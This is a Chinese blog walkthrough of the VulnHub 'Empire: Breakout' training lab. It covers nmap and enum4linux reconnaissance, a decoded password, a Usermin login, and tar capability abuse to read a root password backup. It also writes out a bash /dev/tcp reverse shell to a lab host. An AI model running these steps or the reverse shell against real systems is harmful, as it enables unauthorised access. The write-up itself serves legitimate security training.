【渗透测试】Empire: Breakout靶场渗透测试

admin 2025年3月27日16:46:48评论2 views字数 2332阅读7分46秒阅读模式
FOCUS ON US
点击蓝字.关注我们
【渗透测试】Empire: Breakout靶场渗透测试
【渗透测试】Empire: Breakout靶场渗透测试
01
前言
1.1
 下载安装

下载地址:https://www.vulnhub.com/entry/empire-breakout,751/选择镜像文件进行下载。下载后解压是一个ova文件,在虚拟机中选择-打开虚拟机,选择此文件,然后修改系统网卡为NAT,在高级选项中注意网卡的MAC地址,方便后续查出本机IP。 

该靶场较友好,在开机后会自动显示主机IP地址。

【渗透测试】Empire: Breakout靶场渗透测试
1.2
 文件信息

文件名:02-Breakout.zip

文件大小:1013MB

MD5:C87BC1DB9BD51205B1E9EA441F8222AB

SHA1:164DF36D136E5DA83FCCCF503D36A59B0D26E14A

1.3
 注意事项

02
目标
2.1
 靶场目标

获取root用户。flag文件两个。

cyber用户:user.txtroot用户:r00t.txt
03
渗透测试步骤
3.1
 信息收集

确定主机地址、端口扫描、网站访问、框架扫描、收集SMB信息。

3.1.1 确定主机地址

使用nmap确定该靶场IP地址,地址为:192.168.241.158

nmap -sP 192.168.241.0/24
【渗透测试】Empire: Breakout靶场渗透测试
3.1.2 端口扫描

使用nmap扫描,发现开放80、139、445、10000、20000端口。其存在web服务和Webmin MiniServ服务,并开放SMB共享服务。

nmap -sV -v -T4 -A 192.168.241.158
【渗透测试】Empire: Breakout靶场渗透测试
3.1.3 网站访问

访问80、10000、20000端口。

80端口是一个Apache2的默认页面。

【渗透测试】Empire: Breakout靶场渗透测试

查看源码,发现500行有一段注释信息,其加密方式为brainfuck加密。

【渗透测试】Empire: Breakout靶场渗透测试

使用加解密工具进行解密,结果为:.2uqPEfj3D<P'a-3

猜测该结果为某用户的密码。

【渗透测试】Empire: Breakout靶场渗透测试

10000端口是Webmin的登录界面,根据nmap探测10000端口的Webmin版本为1.981。

【渗透测试】Empire: Breakout靶场渗透测试

20000端口是Usermin的登录页面,20000端口的Webmin版本为1.830。

【渗透测试】Empire: Breakout靶场渗透测试
3.1.4 框架扫描

扫描结果与nmap扫描结果一致,未扫描出更多实质性东西。

【渗透测试】Empire: Breakout靶场渗透测试
3.1.5 收集SMB信息

由于靶机开放了SMB服务,可使用enum4linux收集有关靶机信息。

enum4linux 192.168.241.158
【渗透测试】Empire: Breakout靶场渗透测试

发现cyber用户。

【渗透测试】Empire: Breakout靶场渗透测试
3.2
 漏洞利用

访问登录、命令执行、发现备份文件、读取文件、反弹shell

3.2.1 访问登录

使用获取到的用户Miami登录10000和20000地址,发现20000端口可以登录成功。

cyber/.2uqPEfj3D<P'a-3
【渗透测试】Empire: Breakout靶场渗透测试
3.2.2 命令执行

登录成功后,在左下角发现命令执行窗口。

发现第一个flag。

3mp!r3{You_Manage_To_Break_To_My_Secure_Access}
【渗透测试】Empire: Breakout靶场渗透测试

查看当前用户cyber。

发现tar具有可执行权限。

【渗透测试】Empire: Breakout靶场渗透测试

使用getcap命令查看该文件拥有什么权限。

getcap tar
【渗透测试】Empire: Breakout靶场渗透测试

可读取任意文件权限。

3.2.3 发现备份文件

在经过一段时间寻找后,发现/var/backups下有个备份文件old_pass.bak。

【渗透测试】Empire: Breakout靶场渗透测试
3.2.4 读取文件

使用tar将该文件打包之后再解压出来。

./tar -cvf pass.tar /var/backups/.old_pass.baktar -xvf pass.tar
【渗透测试】Empire: Breakout靶场渗透测试

发现用户目录会多出两个文件:pass.tar和var。

查看该文件,即可获取到root用户密码:Ts&4YurgtRX(=~h

【渗透测试】Empire: Breakout靶场渗透测试
3.2.5 反弹shell

发现命令行,那就反弹shell方便后续操作。

/bin/bash ->& /dev/tcp/192.168.241.138/9876 0>&1
【渗透测试】Empire: Breakout靶场渗透测试
3.3
 权限提升

切换用户、查看r00t.txt文件。

3.3.1 切换用户

既然已经知道了root用户密码,直接切换到root用户即可。

【渗透测试】Empire: Breakout靶场渗透测试
3.3.2 查看r00t.txt文件

在root用户目录下发现第二个flag。

至此该靶场结束。

【渗透测试】Empire: Breakout靶场渗透测试
【渗透测试】Empire: Breakout靶场渗透测试
(
END
)

免责声明

本公众号“暗魂攻防实验室”致力于分享网络安全相关知识及资讯,所有内容仅供学习和交流使用,不得用于任何非法用途。由于传播、利用本公众号“暗魂攻防实验室”所提供的技术和信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任!!!

以下为本公众号声明内容,请知悉并遵守:

1.关于信息的准确性

本公众号所发布的信息均来源于公开渠道或作者整理,仅供参考,不保证内容的绝对准确性、完整性和时效性。使用者在依赖相关内容前,应独立核实信息的真实性和适用性。

2.法律与合规性

使用者应严格遵守国家相关法律法规,确保所有操作仅用于合法用途。本公众号明确禁止任何利用内容进行非法活动的行为,由此产生的后果由使用者自行承担,本公众号及作者不承担任何责任。

3.版权声明

本公众号部分内容如引用了他人作品或资源,均已标注来源或作者。如有侵权,请及时联系我们,我们将在核实后立即删除并致以歉意。

4.合法用途限制

本公众号内容仅供参考,任何利用本公众号内容从事违法行为的后果均由使用者自行承担,本公众号及作者对此不承担任何责任。

5.风险告知

因使用或传播本公众号内容导致的直接或间接后果(如系统损坏、数据丢失、法律责任等),均由使用者自行承担。本公众号及作者对此不承担任何责任。

【渗透测试】Empire: Breakout靶场渗透测试
FINANCE
扫码联系
暗魂攻防实验室官方客服
往期推荐:

Word文档宏病毒感染事件:应急处置与深度分析

【工具推荐】YYBaby-Spring_Scan

【渗透测试】napping-1.0.1靶场渗透测试

【渗透测试】Red:1靶场渗透测试

【渗透测试】Empire: Breakout靶场渗透测试

原文始发于微信公众号(暗魂攻防实验室):【渗透测试】Empire: Breakout靶场渗透测试

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月27日16:46:48
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【渗透测试】Empire: Breakout靶场渗透测试https://cn-sec.com/archives/3890203.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息